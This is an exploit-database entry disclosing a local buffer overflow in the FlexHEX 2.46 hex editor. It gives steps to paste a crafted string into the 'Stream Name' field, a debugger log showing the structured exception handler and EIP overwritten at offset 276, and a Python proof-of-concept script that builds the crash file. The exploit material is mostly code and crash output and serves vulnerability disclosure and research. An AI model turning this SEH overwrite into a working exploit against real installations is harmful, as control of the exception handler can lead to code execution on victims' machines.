FlexHEX 2.46 Denial Of Service

2019.02.02
Risk: Low
Local: No
Remote: No
CVE: N/A
CWE: N/A

# Exploit Title: FlexHEX v2.46 - Denial of Service (PoC) and SEH overwritten Crash PoC # Discovery by: Rafael Pedrero # Discovery Date: 2018-12-20 # Vendor Homepage: http://www.flexhex.com/order/?r1=iNetShortcut&r2=fhx1 # Software Link : http://www.flexhex.com/order/?r1=iNetShortcut&r2=fhx1 # Tested Version: 2.46 # Tested on: Windows XP SP3 # Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow # Steps to Produce the Crash: # 1.- Run FlexHEX.exe # 2.- Go to Menu "Stream" - "New Stream" and copy content of FlexHEX_SEH_Crash.txt to clipboard # 3.- Paste the content into the field: 'Stream Name:' # 4.- Click 'OK' button and you will see a crash. ''' Log data, item 21 Address=0BADF00D Message= SEH record (nseh field) at 0x0012dde8 overwritten with unicode pattern : 0x006a0041 (offset 276), followed by 20 bytes of cyclic data after the handler SEH chain of main thread Address SE handler 0012DDFC FlexHEX.00420042 00420042 8BC13B2C 4E8B3C46 *** CORRUPT ENTRY *** EAX 00410041 FlexHEX.00410041 ECX 00000000 EDX 00000000 EBX 0012FA18 ESP 0012DE3C UNICODE "AAAAAAAAAABBBB" EBP 00410041 FlexHEX.00410041 ESI 0012DE78 EDI 0012E69C EIP 00410041 FlexHEX.00410041 C 0 ES 0023 32bit 0(FFFFFFFF) P 0 CS 001B 32bit 0(FFFFFFFF) A 1 SS 0023 32bit 0(FFFFFFFF) Z 0 DS 0023 32bit 0(FFFFFFFF) S 0 FS 003B 32bit 7FFDF000(FFF) T 0 GS 0000 NULL D 0 O 0 LastErr ERROR_SUCCESS (00000000) EFL 00010212 (NO,NB,NE,A,NS,PO,GE,G) ST0 empty ST1 empty ST2 empty ST3 empty ST4 empty ST5 empty ST6 empty ST7 empty 3 2 1 0 E S P U O Z D I FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT) FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1 ''' #!/usr/bin/env python nseh = "BB" seh = "BB" junk = "\x41" * 276 crash = junk + nseh + seh f = open ("FlexHEX_SEH_Crash.txt", "w") f.write(crash) f.close()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top